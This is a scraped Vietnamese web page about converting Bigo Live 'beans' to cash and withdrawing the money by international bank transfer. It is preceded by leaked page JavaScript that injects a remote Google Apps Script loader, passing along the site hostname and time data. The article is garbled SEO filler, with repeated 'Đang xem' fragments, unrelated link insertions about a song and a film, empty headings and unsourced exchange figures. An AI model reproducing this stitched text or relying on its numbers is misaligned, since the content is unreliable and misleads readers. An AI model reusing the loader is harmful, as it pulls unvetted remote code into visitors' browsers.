var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Gợi ý 1 đậu bigo bao nhiêu tiền hot nhất hiện nay 2023

Ờ bài trước tìm hiểu về Bigo Live là gì? Mình đã giới thiệu chi tiết về Bigo live là gì? hướng dẫn đăng ký và sử dụng bigo live như thế nào? ở bài viết này mình sẽ hướng dẫn kỹ hơn về cách kiếm tiền Bigo Live. Đầu tiên mình cũng điểm nhanh qua Bigo live là gì?

Giới thiệu Bigo live là gì?

Bigo Live là một ứng dụng xã hội trực tuyến kết nối hàng nghìn người trên toàn cầu phát sóng trực tiếp video lên Internet. Tại Bigo Live bạn có thể chia sẻ tài năng của bản thân như ca hát, nhảy múa, nấu ăn,… hay những điểm mạnh nổi bật, những skills trang điểm hay những xu hướng đang thịnh hành. Ngược lại, bạn cũng có thể thưởng thức những màn biểu diễn đặc sắc, những tài năng khiến bạn phải “há miệng” kinh ngạc.

Đang xem: 1000 đậu bigo bằng bao nhiêu tiền

Bạn đang xem: 1 đậu bigo bằng bao nhiêu tiềnBạn đang xem: đổi đậu bigo

Hướng dẫn đăng ký Bigo live?

Hướng dẫn đầu tư Bigo live chi tiết nhất

Có thể nói, Bigo Live là một dịch vụ kiếm tiền online phát triển khá nhnh. Không cần đầu tư quá nhiều, bạn chỉ cần có 1 chiếc smartphone với camera đủ rõ nét cũng với kết nối mạng Internet đủ mạnh là có thể kiếm tiền trên ứng dụng này rồi nè! Với Bigo Live, chúng ta có thể kiếm tiền qua rất nhiều nội dung, mảng khác nhau và chỉ cần thể hiện hết tài năng cũng như đáp ứng được thị hiếu cộng đồng là có thể kiếm tiền rất dễ dàng.

Bạn cũng thấy ở gần đây, việc làm livestream trên Youtube đang trở thành xu hướng của giới trẻ. Tuy dễ kiếm tiền nhưng việc kiếm tiền online này cũng yêu cầu những kĩ năng và cả độ duyên dáng, vận may của bạn nữa đấy.

Bigo live cung cấp tải ứng dụng cho cả iPhone và Android

BƯỚC 1: Tải ứng dụng Bigo Live về máy của bạn nhé!

Lựa chọn hình thức đăng nhập : Điện thoại, Facebook hoặc Gmail.

Xem thêm: Lời Dịch Baby, Loi Bai Hat Baby Justin Bieber Baby Vietsub, Tải Bài Hát Baby

BƯỚC 2: Nhấn vào biểu tượng Camera

Bạn sẽ nhận được yêu cầu xác nhận truy cập bạn hãy nhấn OK

Đối với những người nổi tiếng trên Bigo Live thì số kim cương của học có thể lên đến 72762, sau khi quy đổi ra tiền mặt con số này có thể chứng minh với bạn nó lớn lắm đó nhé!

Hướng dẫn đổi đậu thành tiền

Được bao nhiêu đậu thì người chơi được đổi thành tiền?

Đây cũng là câu hỏi mà nhiều bạn đặt ra. Theo quy định của Bigo khi bạn đạt tối thiểu là 6700 đậu tương ứng với 31$ thì sẽ được đổi ra tiền mặt.Số đậu được đổi nhiều nhất sẽ là 1050000 đậu tương ứng với số tiền là 5000$. Những ai đổi đậu thành tiền trên 1000$ thì công ty Bigo phải cần 25 đến 30 ngày để giải phóng số đậu đó cho bạn.

Đổi đậu thành tiền trên bigo live cần những gì?

Các bước đổi đậu thành tiền trên bigo live

Bước 1: Đăng nhập vào tài khoản Bigo Live của bạn, ấn chọn mục “Ví tiền” sau đó chuyển sang phần “Đậu”. Ví dụ hình bên dưới có 8148 đậu tương đương với 38$ vậy là đủ tiêu chuẩn đổi đậu ra tiền rồi.Bước 1: đổi đậu thành tiềnBước 2: Từ màn hình trên, chọn vào phần “Exchange Rewards”, tiếp theo sẽ hiện ra như sau:Bước 2: đổi đậu thành tiềnBước 3: Nhập mã giống như mã bạn đổi đậu ra kim cương sau đó nhấn vào “OK”.Sau khi hoàn thành bước 3, màn hình sẽ chuyển sang thế này:Bước 4: Lúc này bạn cần nhập số tiền cần đổi ra, lưu ý: đơn vị tiền tệ hiện tại là Đô la Mỹ nhé. Bạn nhập tối thiểu là 31$ và tối đa là 5000$. Nhập số tiền xong chúng ta nhấn “Confirm”. Kết quả như hình bên dưới:Bước 5: Nhấn vào “Creat a new Withdraw adress”. Màn hình mới hiện ra, kéo xuống dưới chọn “International bank Transfer”. Như hình:Bước 6: Sau khi ấn vào International bank Transfer, bảng thông tin thanh toán hiện ra và bạn điền các thông tin theo yêu cầu:

Coutry (Quốc gia) chúng ta chọn VietnamBank: Loại ngân hàng. Tài khoản ngân hàng của bạn thuộc bên nào thì bạn chọn bên đóAccount Number: Điền số tài khoản ngân hàng của bạnLocal Name: Tên tài khoản ngân hàngName in Eng: Chi nhánh tài khoản ngân hàng của bạn nằm ở chỗ nào? Ví dụ ở thành phố Cần Thơ chúng ta viết là can tho cityID Card Number: Số chứng minh thư nhân dânCellphone Number: Số điện thoạiEmail Address: Tài khoản Email

Yêu cầu: Tất cả thông tin ở trên phải nhập đầy đủ, chính xác, nếu sai sót bạn có thể không nhận được tiền hoặc chuyển nhầm tiền cho người khácBước 7: Sau khi nhập xong thông tin ta ấn “Save”.

Câu hỏi thường gặp về Bigo Live?

Con rồng trong bigo bao nhiêu tiền?

Một con rồng trong bigo bao nhiêu tiền là câu hỏi của khá nhiều người hiện nay. Bởi một con rồng thật sự mang giá trị khủng và một khán giả phải yêu thích idol thật sự thì mới dành tặng một siêu phẩm quà tặng như thế.Con rồng trong bigo có trị giá lên đến 1.000.000 đồng, con số này đủ hấp dẫn để mọi idol mơ ước được một lần sở hữu chú rồng huyền thoại này.Và tỷ lệ luôn hiếm dành cho những phần quà giá trị, rồng là một trong số đó nên khá ít xuất hiện trên Bigo Live mà thay vào đó là các đơn vị trao đổi thông thường khác.

Xem thêm: Nữ Chính Bản Gốc ” Và Em Sẽ Đến Hd, Và Em Sẽ Đến

Các Idol trên Bigo live làm thế nào để kiếm tiền?

Lương idol bigo một tháng được bao nhiêu?

Kết luận hướng dẫn kiếm tiền Bigo Live

Việc kiếm tiền trên ứng dụng Bigo Live không khó phải không nào nhưng lại rất cần kĩ năng đó nhé. Đây là sân chơi, sàn diễn cho những ai muốn thể hiện bản thân, hay tìm kiếm những người bạn, nhóm bạn có chung đam mê. Bạn có thể thử ngay để có những trải nghiệm thú vị. doanhnhan.edu.vn hi vọng bài viết trên sẽ có ích với các bạn. Nếu có bất kì thắc mắc hay góp ý cho bài viết, hãy để lại nhận xét, doanhnhan.edu.vn sẽ phản hồi sớm nhất có thể. Cảm ơn sự quan tâm và theo dõi của bạn.